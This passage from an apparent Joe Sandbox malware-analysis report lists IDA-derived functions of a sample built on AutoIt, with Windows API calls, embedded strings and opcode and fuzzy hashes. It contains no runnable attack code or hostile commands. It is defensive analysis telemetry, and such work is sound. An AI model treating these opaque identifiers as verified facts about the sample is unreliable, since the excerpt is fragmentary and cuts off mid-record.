                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: a07a944fe4f2ae7f1e972cde4e1c1e3d077ab0adf5a98d71eb421617d75786cf
                    • Instruction ID: 48c52eba70cc4ac0ecaf206ccf8808eb9c6ac74af3e775c7edc5df76e1976d9a
                    • Opcode Fuzzy Hash: a07a944fe4f2ae7f1e972cde4e1c1e3d077ab0adf5a98d71eb421617d75786cf
                    • Instruction Fuzzy Hash: 84B190B160020ADFDB24EFA8DC55BED7BB5FB08710F108229FA15E7290CB749951CB55
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007040F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007041B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 50a020ee759d83dc58bf24cd66cdc9bf66218aa1213066ec2a24264013751ee6
                    • Instruction ID: 5141d5003c093c7f83e62678bf38e4dced9c64bf3258f894a15ba6d8ae713fda
                    • Opcode Fuzzy Hash: 50a020ee759d83dc58bf24cd66cdc9bf66218aa1213066ec2a24264013751ee6
                    • Instruction Fuzzy Hash: 9BA19EB0214201DFDB54FF20C882A6AB3E6BF84314F144A6CB9969B3D2DB38EC05CB55
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 006F5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 006F5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 006F531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 006F532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 006F5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 006F5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 006F534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 006F5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 006F5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 006F536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 006F5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 006F5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 006F538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 006F5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 006F53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 006F53AE
                    • GetCursorInfo.USER32(?), ref: 006F53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 006F53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: db290ac4c3ebe168454eed9bbc80e230246b97d66706db33532a4f899810c7a8
                    • Instruction ID: 209ce12a50f9c7ebad4a270f7941744ac265e499c40a57c69acbcffac930800a
                    • Opcode Fuzzy Hash: db290ac4c3ebe168454eed9bbc80e230246b97d66706db33532a4f899810c7a8
                    • Instruction Fuzzy Hash: 17415670E043196ADB109FB68C4996EFFF9EF51750B10452FE609E7290DAB858018E55
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 006DAAA5
                    • __swprintf.LIBCMT ref: 006DAB46
                    • _wcscmp.LIBCMT ref: 006DAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 006DABAE
                    • _wcscmp.LIBCMT ref: 006DABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 006DAC21
                    • GetDlgCtrlID.USER32(?), ref: 006DAC73
                    • GetWindowRect.USER32(?,?), ref: 006DACA9
                    • GetParent.USER32(?), ref: 006DACC7
                    • ScreenToClient.USER32(00000000), ref: 006DACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 006DAD48
                    • _wcscmp.LIBCMT ref: 006DAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 006DAD82
                    • _wcscmp.LIBCMT ref: 006DAD96
                      • Part of subcall function 006A386C: _iswctype.LIBCMT ref: 006A3874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 22eb08a67e43bd3d92a245146c560b4fde80d65d22d8914dfbb42462c7fae57f
                    • Instruction ID: f0265a34dafa131f00081878a9274fa1c41de16e4c5903cf72f1ed088d13d652
                    • Opcode Fuzzy Hash: 22eb08a67e43bd3d92a245146c560b4fde80d65d22d8914dfbb42462c7fae57f
                    • Instruction Fuzzy Hash: 9CA1C371608306ABD714DFA0C884BEAB7EAFF44315F00462EF999C2750DB34E945CB92
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 006DB3DB
                    • _wcscmp.LIBCMT ref: 006DB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 006DB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 006DB431
                    • _wcscmp.LIBCMT ref: 006DB44F
                    • _wcsstr.LIBCMT ref: 006DB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006DB498
                    • _wcscmp.LIBCMT ref: 006DB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 006DB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 006DB518
                    • _wcscmp.LIBCMT ref: 006DB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 006DB550
                    • GetWindowRect.USER32(00000004,?), ref: 006DB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: 0edbe87c6b41c5942dc424c1d6f9ba7353cf5db51eb47a2cb3ab974a5812e6a3
                    • Instruction ID: ae0f1396d179b5adac05f9451427ec1fae4edc3f8db22b09f95591c974229d75
                    • Opcode Fuzzy Hash: 0edbe87c6b41c5942dc424c1d6f9ba7353cf5db51eb47a2cb3ab974a5812e6a3
                    • Instruction Fuzzy Hash: DD81DD71408205DBDB10DF10D881FAA7BEAEF44314F08916EFD858A39ADB34DD49CBA5
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DragQueryPoint.SHELL32(?,?), ref: 0070C917
                      • Part of subcall function 0070ADF1: ClientToScreen.USER32(?,?), ref: 0070AE1A
                      • Part of subcall function 0070ADF1: GetWindowRect.USER32(?,?), ref: 0070AE90
                      • Part of subcall function 0070ADF1: PtInRect.USER32(?,?,0070C304), ref: 0070AEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0070C980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0070C98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0070C9AE
                    • _wcscat.LIBCMT ref: 0070C9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0070C9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0070CA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0070CA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0070CA47
                    • DragFinish.SHELL32(?), ref: 0070CA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0070CB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prt
                    • API String ID: 169749273-2223109485
                    • Opcode ID: f9e4df4d17e6e294f89a6a5b37a77393410260af9eff89f9bd487d84a000df7e
                    • Instruction ID: e164349076eac435bdd3e319b74e20995e35632b65655dd54a4f2ac7582745a6
                    • Opcode Fuzzy Hash: f9e4df4d17e6e294f89a6a5b37a77393410260af9eff89f9bd487d84a000df7e
                    • Instruction Fuzzy Hash: 3A616971108301EFC711EF64CC85D9BBBE9EB89710F004A2EF692921A1DB749A49CB56
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 7af5cc3c8428cfa493912864c91367103fce47f16f8527c71fb574f3853b695f
                    • Instruction ID: ebe2bc6e7b5c5d21c5250ce80f264f8e0ada257c8a4668ccf67a03db1481bfca
                    • Opcode Fuzzy Hash: 7af5cc3c8428cfa493912864c91367103fce47f16f8527c71fb574f3853b695f
                    • Instruction Fuzzy Hash: B831C372904305E6EB54FA60CD83EFE77A69F14750F60011EF541712DAEFA1AF04CA99
                    APIs
                    • LoadIconW.USER32(00000063), ref: 006DC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 006DC4E6
                    • SetWindowTextW.USER32(?,?), ref: 006DC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 006DC512
                    • SetWindowTextW.USER32(00000000,?), ref: 006DC518
                    • GetDlgItem.USER32(?,000003E9), ref: 006DC528
                    • SetWindowTextW.USER32(00000000,?), ref: 006DC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 006DC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 006DC569
                    • GetWindowRect.USER32(?,?), ref: 006DC572
                    • SetWindowTextW.USER32(?,?), ref: 006DC5DD
                    • GetDesktopWindow.USER32 ref: 006DC5E3
                    • GetWindowRect.USER32(00000000), ref: 006DC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 006DC636
                    • GetClientRect.USER32(?,?), ref: 006DC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 006DC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 006DC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: ade9f2953554c7c865b5bcc910d1bbc18b20c4bdf14e503ddc0a34d022bd8f49
                    • Instruction ID: 757b1a29885f27efd6f284756f91ef90a538f98ffab880ec66f15fde3c1e1ede
                    • Opcode Fuzzy Hash: ade9f2953554c7c865b5bcc910d1bbc18b20c4bdf14e503ddc0a34d022bd8f49
                    • Instruction Fuzzy Hash: 4451617090070AEFDB20DFA8DD85BAEBBF6FF04715F004629E542A26A0CB75E915CB54
                    APIs
                    • _memset.LIBCMT ref: 0070A4C8
                    • DestroyWindow.USER32(?,?), ref: 0070A542
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0070A5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0070A5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0070A5F1
                    • DestroyWindow.USER32(00000000), ref: 0070A613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00680000,00000000), ref: 0070A64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0070A663
                    • GetDesktopWindow.USER32 ref: 0070A67C
                    • GetWindowRect.USER32(00000000), ref: 0070A683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0070A69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0070A6B3
                      • Part of subcall function 006825DB: GetWindowLongW.USER32(?,000000EB), ref: 006825EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: 0faa51b4d9ec829b662315a2d4ad270759f51cfee4124f5e117f86fdb7534df8
                    • Instruction ID: a0ce6d9eb783a400c3677861fc9d064f14797b8cc1af0e6ba52a220ade1ba40f
                    • Opcode Fuzzy Hash: 0faa51b4d9ec829b662315a2d4ad270759f51cfee4124f5e117f86fdb7534df8
                    • Instruction Fuzzy Hash: 89715871150305EFD720DF68CC49F667BFAEB89304F08462DF985872A1DB7AA942CB16
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007046AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007046F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: dd6fc78a74cc60c7dc83d914d6bb326fd84cdc1ea1b97bdb026de34000f7c95f
                    • Instruction ID: 21683e62738268961875fe5f2522a891ed8dac647769ea14bc596c7a6acbaece
                    • Opcode Fuzzy Hash: dd6fc78a74cc60c7dc83d914d6bb326fd84cdc1ea1b97bdb026de34000f7c95f
                    • Instruction Fuzzy Hash: F1918EB4204301DFCB54FF10C491A6AB7E2AF85314F048A6DF9965B3A2DB39ED06CB55
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0070BB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00706D80,?), ref: 0070BBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0070BC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0070BC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0070BC7D
                    • FreeLibrary.KERNEL32(?), ref: 0070BC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0070BC99
                    • DestroyIcon.USER32(?), ref: 0070BCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0070BCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0070BCD1
                      • Part of subcall function 006A313D: __wcsicmp_l.LIBCMT ref: 006A31C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 22a4bdda9a50c1c8fac58e9a517e6ecbf790659797f750bbf375526453a25562
                    • Instruction ID: 60c0d8bf7a94685cf66b43e719a5a9bcbf9aed90d6f0ed959f537d178aabe86f
                    • Opcode Fuzzy Hash: 22a4bdda9a50c1c8fac58e9a517e6ecbf790659797f750bbf375526453a25562
                    • Instruction Fuzzy Hash: 1C61A0B1540219FAEB24EF64CC85BBE77A8FB08710F108619F915D61D1DB78AE90DBA0
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,0070FB78), ref: 006EA0FC
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 006EA11E
                    • __swprintf.LIBCMT ref: 006EA177
                    • __swprintf.LIBCMT ref: 006EA190
                    • _wprintf.LIBCMT ref: 006EA246
                    • _wprintf.LIBCMT ref: 006EA264
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%q
                    • API String ID: 311963372-1119993623
                    • Opcode ID: 0c262e4af9a180e9a69c2dae1b7be857b0020a0232082c67257bd09cbe6a6d18
                    • Instruction ID: 7a7aeb5181750bf12729cc0153ca3f7f650af5b68df51329962aa9ce6af98e7c
                    • Opcode Fuzzy Hash: 0c262e4af9a180e9a69c2dae1b7be857b0020a0232082c67257bd09cbe6a6d18
                    • Instruction Fuzzy Hash: F2518E71800209BACF55FBE0CD86EEEB77AAF05300F244269F505721A2EB35AF58DB55
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • CharLowerBuffW.USER32(?,?), ref: 006EA636
                    • GetDriveTypeW.KERNEL32 ref: 006EA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006EA730
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 5a064ffd7f2e0a42195dc64577cbb6221527d01a575cacddce229f9568658674
                    • Instruction ID: 8b75fb1c81c1131c3ab68d9305d269961dfc9bcb4e749e0636a725f33007f160
                    • Opcode Fuzzy Hash: 5a064ffd7f2e0a42195dc64577cbb6221527d01a575cacddce229f9568658674
                    • Instruction Fuzzy Hash: 61516DB51043049FD740EF21C88286AB7F6FF98718F144A6CF89657262DB31EE0ACB56
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006EA47A
                    • __swprintf.LIBCMT ref: 006EA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 006EA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006EA4FE
                    • _memset.LIBCMT ref: 006EA51D
                    • _wcsncpy.LIBCMT ref: 006EA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006EA58E
                    • CloseHandle.KERNEL32(00000000), ref: 006EA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 006EA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 006EA5AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 4e362c7897d2d7468cd988019ad625433994c35d15b3a611bc723956cbdaa286
                    • Instruction ID: 9213017c93c1206c24973e37dc205428656e331000a10dc33294583efa926dcc
                    • Opcode Fuzzy Hash: 4e362c7897d2d7468cd988019ad625433994c35d15b3a611bc723956cbdaa286
                    • Instruction Fuzzy Hash: 2F31D2B1500249ABDB20DFA1DC49FEB77BDEF89700F1041BAF908D2160EB7497448B29
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
